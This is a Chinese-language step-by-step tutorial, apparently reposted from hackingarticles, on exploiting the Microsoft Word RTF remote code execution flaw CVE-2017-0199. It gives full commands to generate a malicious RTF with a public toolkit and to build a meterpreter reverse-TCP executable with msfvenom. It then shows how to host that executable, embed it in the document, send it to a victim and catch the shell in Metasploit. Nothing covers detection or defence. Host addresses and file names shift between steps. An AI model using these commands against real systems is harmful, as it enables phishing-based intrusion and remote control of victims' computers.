利用工具包CVE-2017-0199 – v2.0是一个方便的python脚本,它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件,并将metasploit/meterpreter /任何其他有效载荷提供给受害者,而不需要任何复杂的配置。
攻击者:Kali Linux
目标:Windows 10( Microsoft Word 2007 – 2013 )
打开kali Linux内的终端,然后输入以下内容:
Git clone https://github.com/bhdresh/CVE-2017-0199.git
cd CVE-2017-0199 python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.13/raj.doc
此命令会运行一个Python脚本生成Rich Text Format有效载荷,其中-M用于生成RTF文件,-w用于设置RTF文件名sales.rtf ”,-u设置攻击者的IP地址或域名。
你可以在给出的屏幕截图中看到以上命令生成了一个恶意的文件sales .rtf,在我们将这个文件发送给我们的受害者之前,我们需要为它插入后门文件,以便我们可以建立与受害者的反向连接。
重新打开个终端,使用msfvenom来准备一个exe payload以进行攻击后续权限维持。
Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 –f exe > /root/Desktop/raj.exe
现在将raj.exe放入/var/www/html,当然如果你有自己网站就放网站目录里面,确定能访问就OK。
现在键入以下命令,将raj.exe与sales.rtf进行合并。然后,发送这个恶意RTF文件给受害者,同时用 start multi handler连接受害者。
python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe
当受害者打开sale.rtf文件时,你就可以在metasploite框架内看到已经连接上的会话。
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.24 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit meterpreter > sysinfo
*来源:hackingarticles,